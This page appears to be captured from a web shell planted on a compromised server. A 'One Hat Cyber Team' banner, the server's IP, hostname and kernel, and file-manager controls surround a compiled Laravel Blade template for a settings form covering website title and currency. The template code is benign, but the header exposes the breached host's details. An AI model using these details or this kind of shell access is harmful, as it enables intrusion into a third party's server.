⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.19
Server IP:
178.33.27.10
Server:
Linux cpanel.dev-unit.com 3.10.0-1160.108.1.el7.x86_64 #1 SMP Thu Jan 25 16:17:31 UTC 2024 x86_64
Server Software:
Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
PHP Version:
8.2.11
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
home
/
id
/
public_html
/
storage
/
framework
/
views
/
View File Name :
12eb04a87b7a616cc84a1e81df9adb115f6391cd.php
<?php $__env->startSection('content'); ?> <div class="page-header"> <h4 class="page-title"><?php echo e($keywords['Information'] ?? __('Information')); ?></h4> <ul class="breadcrumbs"> <li class="nav-home"> <a href="<?php echo e(route('user-dashboard')); ?>"> <i class="flaticon-home"></i> </a> </li> <li class="separator"> <i class="flaticon-right-arrow"></i> </li> <li class="nav-item"> <a href="#"><?php echo e($keywords['Basic_Settings'] ?? __('Basic Settings')); ?></a> </li> <li class="separator"> <i class="flaticon-right-arrow"></i> </li> <li class="nav-item"> <a href="#"><?php echo e($keywords['Information'] ?? __('Information')); ?></a> </li> </ul> </div> <div class="row"> <div class="col-md-12"> <div class="card"> <form id="ajaxForm" action="<?php echo e(route('user.basic_settings.update_info')); ?>" method="post"> <?php echo csrf_field(); ?> <div class="card-header"> <div class="row"> <div class="col-lg-10"> <div class="card-title"><?php echo e($keywords['Update_Information'] ?? __('Update Information')); ?> </div> </div> </div> </div> <div class="card-body py-5"> <div class="row"> <div class="col-lg-6 offset-lg-3"> <div class="form-group"> <label><?php echo e($keywords['Website_Title'] ?? __('Website Title')); ?></label> <input type="text" class="form-control" name="website_title" value="<?php echo e(isset($data->website_title) ? $data->website_title : ''); ?>" placeholder="<?php echo e($keywords['Enter_Website_Title'] ?? __('Enter Website Title')); ?>"> <p id="errwebsite_title" class="em text-danger mb-0"></p> </div> <div class="row"> <div class="col-12"> <div class="form-group"> <br> <h3 class="text-warning"> <?php echo e($keywords['Currency_Settings'] ?? __('Currency Settings')); ?></h3> <hr class="divider"> </div> </div> <div class="col-lg-6"> <div class="form-group"> <label><?php echo e($keywords['Base_Currency_Symbol'] ?? __('Base Currency Symbol')); ?> **</label> <input type="text" class="form-control ltr" name="base_currency_symbol" value="<?php echo e($data->base_currency_symbol); ?>"> <p id="errbase_currency_symbol" class="em text-danger mb-0"></p> </div> </div> <div class="col-lg-6"> <div class="form-group"> <label><?php echo e($keywords['Base_Currency_Symbol_Position'] ?? __('Base Currency Symbol Position')); ?> **</label> <select name="base_currency_symbol_position" class="form-control ltr"> <option value="left" <?php echo e($data->base_currency_symbol_position == 'left' ? 'selected' : ''); ?>> <?php echo e($keywords['Left'] ?? __('Left')); ?> </option> <option value="right" <?php echo e($data->base_currency_symbol_position == 'right' ? 'selected' : ''); ?>> <?php echo e($keywords['Right'] ?? __('Right')); ?> </option> </select> <p id="errbase_currency_symbol_position" class="em text-danger mb-0"></p> </div> </div> <div class="col-lg-4"> <div class="form-group"> <label><?php echo e($keywords['Base_Currency_Text'] ?? __('Base Currency Text')); ?> **</label> <input type="text" class="form-control ltr" name="base_currency_text" value="<?php echo e($data->base_currency_text); ?>"> <p id="errbase_currency_text" class="em text-danger mb-0"></p> </div> </div> <div class="col-lg-4"> <div class="form-group"> <label><?php echo e($keywords['Base_Currency_Text_Position'] ?? __('Base Currency Text Position')); ?> **</label> <select name="base_currency_text_position" class="form-control ltr"> <option value="left" <?php echo e($data->base_currency_text_position == 'left' ? 'selected' : ''); ?>> <?php echo e($keywords['Left'] ?? __('Left')); ?> </option> <option value="right" <?php echo e($data->base_currency_text_position == 'right' ? 'selected' : ''); ?>> <?php echo e($keywords['Right'] ?? __('Right')); ?> </option> </select> <p id="errbase_currency_text_position" class="em text-danger mb-0"></p> </div> </div> <div class="col-lg-4"> <div class="form-group"> <label><?php echo e($keywords['Base_Currency_Rate'] ?? __('Base Currency Rate')); ?> **</label> <div class="input-group mb-2"> <div class="input-group-prepend"> <span class="input-group-text"><?php echo e(__('1 USD')); ?> =</span> </div> <input type="text" name="base_currency_rate" class="form-control ltr" value="<?php echo e($data->base_currency_rate); ?>"> <div class="input-group-append"> <span class="input-group-text"><?php echo e($data->base_currency_text); ?></span> </div> </div> <p id="errbase_currency_rate" class="em text-danger mb-0"></p> </div> </div> </div> </div> </div> </div> <div class="card-footer"> <div class="row"> <div class="col-12 text-center"> <button type="submit" data-form="ajaxForm" id="" class="submitBtn btn btn-success"> <?php echo e($keywords['Update'] ?? __('Update')); ?> </button> </div> </div> </div> </form> </div> </div> </div> <?php $__env->stopSection(); ?> <?php echo $__env->make('user.layout', \Illuminate\Support\Arr::except(get_defined_vars(), ['__data', '__path']))->render(); ?><?php /**PATH /home/id/public_html/resources/views/user/settings/information.blade.php ENDPATH**/ ?>